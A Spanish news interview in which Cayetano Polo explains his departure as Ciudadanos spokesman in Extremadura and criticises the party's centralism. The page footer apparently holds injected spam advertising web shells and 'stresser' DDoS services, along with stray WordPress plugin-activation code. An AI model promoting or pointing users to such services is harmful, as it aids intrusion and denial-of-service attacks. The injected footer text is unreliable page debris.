«Madrid se preocupa poco por los territorios»


Cayetano Polo recuerda el día que entró en política, «en noviembre de 2014, cuando formamos la agrupación de Ciudadanos en Cáceres. Éramos 20 personas». Este jueves anunció su marcha desde el atril del parlamento extremeño, donde ejercía de portavoz de un grupo parlamentario de siete diputados, la tercera fuerza más votada en la región, además de reunir más de 160 concejales, gobernar en Villafranca de los Barros y dentro de unos meses en Badajoz. De momento, prefiere no entrar al detalle que ha motivado su marcha, aunque no esconde que se debe a desavenencias con la dirección nacional. «No quiero irme haciendo sangre, no es mi estilo, y la verdad es que le estoy muy agradecido a Ciudadanos». Lo que no impide que diga, como «reflexión constructiva», que la formación naranja «actúa demasiado vertical y debe contar más con los territorios».

– ¿Cuáles son las razones de su marcha?

– En política hay que estar el tiempo justo para aportar soluciones a los problemas de la gente, siempre lo he dicho, y cuando sientes que no tienes ya esa frescura y no puedes aportar o no te dejan aportar más, pues es mejor volver a tu actividad profesional.

– ¿Pero por qué ahora?

– Es el momento en que se está renovando las estructuras internas, en unas semanas se elegirá comité autonómico. Mis discrepancias con el partido no son tan importantes, no son cosas que te enfrenten o te hagan imposible seguir, pero sí hay diferencias que yo las he ido comunicando, por ejemplo, que los órganos autonómicos los elijan los afiliados, o tener decisión para decidir el voto si has negociado previamente muchas enmiendas a los presupuestos de la comunidad, y en general Madrid se preocupa poco por los territorios. Pero no me voy porque piense que está todo mal ni que Ciudadanos se equivoca en todo, ni mucho menos. Hay una nueva estructuras, y si no te ves bien en ella, es el momento de irse.

– ¿Reconocerá que Ciudadanos queda descabezada con su marcha?

– Empezamos desde cero y ahora hay una estructura mediana, con más de 160 concejales, el gobierno próximo de Badajoz, gobernamos en Villafranca de los Barros y siete diputados autonómicos. Próximamente se elegirá un comité autonómico. Yo comuniqué la semana pasada a la dirección nacional que quería apartarme y me dijeron si no prefería estar en ningún sitió del comité, además tenía la opción de estar casi tres años más en el Asamblea, pero si uno se va, se va.

– Se ha dicho que no iba a ser su marcha obedecía a que la dirección nacional prefería darle más de Ignacio Grajera y eso podría ir en detrimento suyo en el comité autonómico

-Desconozco cuál va a ser la formación del comité autonómico, imagino que Ignacio estará en él porque además de ser próximamente el alcalde de una ciudad como Badajoz es una figura del partido al alza y valiosa, pero no sé en qué cargo estará.

– Si el PSOE no hubiera logrado la mayoría absoluta en las elecciones autonómicas y el voto de Ciudadanos fuera más valioso en la política extremeña, ¿se habría quedado?

– Puede que sí, no lo he pensado, pero es posible, aunque sinceramente no lo sé.

– ¿Qué futuro prevé para Ciudadanos, volverá a jugar un papel central en la política española o se disolverá poco a poco como le sucedió al CDS y UPyD?

– Ciudadanos tiene que ser capaz de estar donde estuvo al principio, lo que significa defender valores y levantar banderas como la unidad de España, la defensa del estado de derecho y la regeneración política. Y además debe ser un partido que la gente identifique siempre con el consenso, con ser un punto de unión, acercar a los discrepantes. Yo creo que ese debe ser el afán nuestro, alejarnos de vetos y de posiciones irrenunciables. Ese es el papel que comenzamos ejerciendo y para eso está Ciudadanos.

– Sin embargo, Albert Rivera, a quien usted valora mucho, se alejó de esas posiciones y vetó a Sánchez

– No creo que Albert se equivocara en eso, en realidad no es tan así porque Sánchez en ningún momento se planteó de verdad gobernar con Ciudadanos, mientras que nosotros sí hicimos esfuerzos. Yo creo que el problema fue que no se supo comunicar bien nuestra posición y la sociedad interpretó que nos habíamos alejado de esa posición de acercar diferentes opiniones y de consenso.

– ¿A quién comunicó su marcha?

– El día antes se lo dije a los compañeros del grupo parlamentario, y antes a mi familia. Además, ya he dicho que la semana pasada le comuniqué mis intenciones a la dirección nacional.

– ¿A qué piensa dedicarse?

– Me tomaré unos días de descanso y volveré a mi profesión, soy ingeniero de montes y llevo 22 años cotizados. Tengo mono de volver a la empresa privada.

– ¿Volverá a la política?

– Hasta noviembre de 2014 cuando formamos la agrupación local de Cáceres ni se me había pasado por la cabeza participar en política. Ahora no sé dónde las vida nos llevará, pero de momento no, no pienso en ningún otro partido.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );